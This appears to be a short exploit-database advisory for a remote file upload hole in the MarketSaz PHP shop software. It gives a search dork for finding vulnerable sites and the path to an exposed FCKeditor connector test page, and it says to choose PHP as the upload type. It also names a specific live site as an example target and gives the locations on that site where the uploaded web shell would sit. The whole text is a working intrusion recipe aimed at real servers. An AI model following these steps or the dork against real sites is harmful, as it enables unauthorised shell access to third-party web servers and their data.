========================================== MarketSaz remote file Upload Vulnerability ========================================== #Exploit Title: MarketSaz remote file uploade #Author: NetQurd (NetQurd@Live.com) #Dork : English = Powered MarketSaz #Software Link: http://www.marketsaz.com #Platform :linux/php #Exploit : http://target.com #http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html #Example site: http://www.langarshop.ir #Select the "File Upload" To use = php #http://www.langarshop.ir/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html #Sh3ll : http://www.langarshop.ir/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php #OR #http://www.langarshop.ir/shell.php # Spical Thanks To Net.Edit0r (Net.Edit0r@att.net)